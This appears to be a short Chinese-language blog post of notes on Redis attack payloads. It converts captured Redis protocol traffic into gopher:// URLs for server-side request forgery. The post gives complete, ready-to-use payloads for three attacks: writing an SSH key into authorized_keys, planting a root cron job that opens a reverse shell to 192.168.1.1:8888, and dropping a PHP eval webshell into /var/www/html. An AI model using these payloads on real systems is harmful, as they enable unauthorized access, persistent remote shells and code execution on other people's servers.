redis payload笔记

抓去流量的方法

1.安装redis与socat

2.启动redis,使用socat对redis的流量做一下转发

socat -v tcp-listen:4444,fork tcp-connect:127.0.1:6379

然后

redis-cli -p 4444

输入如下命令

flushall
config set dir /home/redis/.ssh/
config set dbfilename authorized_keys
set x "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ www-data@20823789636d"
save

获取大致如下的流量

*1\r
$8\r
flushall\r
< 2020/04/24 19:57:32.273053  length=5 from=0 to=4
+OK\r
> 2020/04/24 19:57:38.830175  length=58 from=18 to=75
*4\r
$6\r
config\r
$3\r
set\r
$3\r
dir\r
$17\r
/home/redis/.ssh/\r
< 2020/04/24 19:57:38.830886  length=5 from=5 to=9
+OK\r
> 2020/04/24 19:57:44.688296  length=64 from=76 to=139
*4\r
$6\r
config\r
$3\r
set\r
$10\r
dbfilename\r
$15\r
authorized_keys\r
< 2020/04/24 19:57:44.688847  length=5 from=10 to=14
+OK\r
> 2020/04/24 19:57:51.586985  length=430 from=140 to=569
*3\r
$3\r
set\r
$1\r
x\r
$402\r
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ www-data@20823789636d\r
< 2020/04/24 19:57:51.588584  length=5 from=15 to=19
+OK\r
> 2020/04/24 19:58:01.597515  length=14 from=570 to=583
*1\r
$4\r
save\r
< 2020/04/24 19:58:01.600311  length=5 from=20 to=24
+OK\r

3.将多余部分删除,换行\r\n替换为%0d%0a,空格变为%20,大致处理为如下格式

*1%0d%0a$8%0d%0aflushall%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$17%0d%0a/home/redis/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$402%0d%0assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ%20www-data@20823789636d%0d%0a*1%0d%0a$4%0d%0asave%0d%0a

4.执行

curl -v "gopher://127.0.0.1:6379/*1%0d%0a$8%0d%0aflushall%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$17%0d%0a/home/redis/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$402%0d%0assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ%20www-data@20823789636d%0d%0a*1%0d%0a$4%0d%0asave%0d%0a
"

写计划任务

命令行

flushall

set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/8888 0>&1\n"

config set dir /var/spool/cron/

config set dbfilename root

save

gopher

curl -v "gopher://127.0.0.1:6379/_*1%0d%0a\$8%0d%0aflushall%0d%0a*3%0d%0a\$3%0d%0aset%0d%0a\$1%0d%0a1%0d%0a\$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/192.168.1.1/8888>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$3%0d%0adir%0d%0a\$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$10%0d%0adbfilename%0d%0a\$4%0d%0aroot%0d%0a*1%0d%0a\$4%0d%0asave%0d%0aquit%0d%0a"

写webshell

命令行

flushall

set x "<?php eval($_POST[c]);?>"

config set dir /var/www/html

config set dbfilename shell.php

save

gopher

gopher://127.0.0.1:6379/_*1%0d%0a\$8%0d%0aflushall%0d%0a*3%0d%0a\$3%0d%0aset%0d%0a\$1%0d%0ax%0d%0a\$25%0d%0a%3C%3Fphp%20%40eval(%24_POST%5Bc%5D)%3B%3F%3E%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$3%0d%0adir%0d%0a\$13%0d%0a/var/www/html%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$10%0d%0adbfilename%0d%0a\$9%0d%0ashell.php%0d%0a*1%0d%0a\$4%0d%0asave%0d%0a
posted @ 2020-01-19 14:08  ~kagi~  阅读(491)  评论(0编辑  收藏  举报